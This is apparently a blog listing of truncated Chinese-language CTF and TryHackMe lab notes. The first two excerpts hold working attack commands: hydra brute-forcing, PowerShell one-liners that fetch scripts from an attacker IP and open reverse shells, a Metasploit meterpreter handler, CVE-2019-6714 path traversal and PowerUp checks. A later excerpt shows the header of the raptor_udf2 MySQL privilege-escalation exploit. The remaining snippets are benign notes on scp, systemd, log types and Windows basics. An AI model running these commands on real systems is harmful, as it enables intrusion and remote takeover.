MoonlitSyntax

Rustscan寄掉了 应该是有检测 nmap -p- --min-rate=5000 -Pn 10.10.193.34 hydra爆破 j_username=admin&j_password=123456&from=%2F&Submit=Sign+in admin:admin登录 然后用他那个工具来反弹shell powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.6.173/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.6.173 -Port 9999powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.17.6.173/shell-name.exe','shell-name.exe')" msfveno ...

爆破进后台 CVE-2019-6714 直接利用反弹shell ?theme=../../App_Data/files powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.17.6.173/shell-name.exe','shell-name.exe')"msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 10000;set payload windows/meterpreter/reverse_tcp;run' 上msf load powershellpowershell_shell. .\PowerUp.ps1Invoke-AllChecks 这个服务可以利用\ cd "c:\program files (x86)"然后进去events cat日志看看 S > cat 20198415519. ...

scp 本地=>远程scp important.txt ubuntu@192.168.1.30:/home/ubuntu/transferred.txt远程=>本地scp ubuntu@192.168.1.30:/home/ubuntu/documents.txt notes.txt 一旦系统启动并初始化，systemd 就是第一个启动的进程之一。我们想要启动的任何程序或软件都将作为 systemd 的子进程启动。这意味着它由systemd控制，但会作为自己的进程运行（尽管共享systemd的资源），以便我们更容易识别等 For example, once a system boots and it initialises, systemd is one of the first processes that are started. Any program or piece of software that we want to start will start as what’s known as a child process of systemd. This mea ...

日志种类 Application Logs: Messages about specific applications, including status, errors, warnings, etc. 应用程序日志：有关特定应用程序的消息，包括状态、错误、警告等。 Audit Logs: Activities related to operational procedures crucial for regulatory compliance. 审核日志：与对法规遵从性至关重要的操作程序相关的活动。 Security Logs: Security events such as logins, permissions changes, firewall activity, etc. 安全日志：安全事件，例如登录、权限更改、防火墙活动等。 Server Logs: Various logs a server generates, including system, event, error, and access logs. 服务器日志：服务器生成的各种日志，包括系统日志、事件日志、 ...

ssh -oHostKeyAlgorithms=+ssh-rsa user@10.10.78.210 已经移除了ssh-rsa mysql root启动 /* * $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $ * * raptor_udf2.c - dynamic library for do_system() MySQL UDF * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * * This is an helper dynamic library for local privilege escalation through * MySQL run with root privileges (very bad idea!), slightly modified to work * with newer versions of the open-source database. Tested on MySQL 4.1.14. * * ...

Pro可以启用Bitlocker New Technology File System就是NTFS啊 Windows文件夹的系统变量 %windir% echo $env:windir=> C:\Windows net user tryhackmebilly查看组 UAC User Account Control 可以在lusrmgr.msc查看密码策略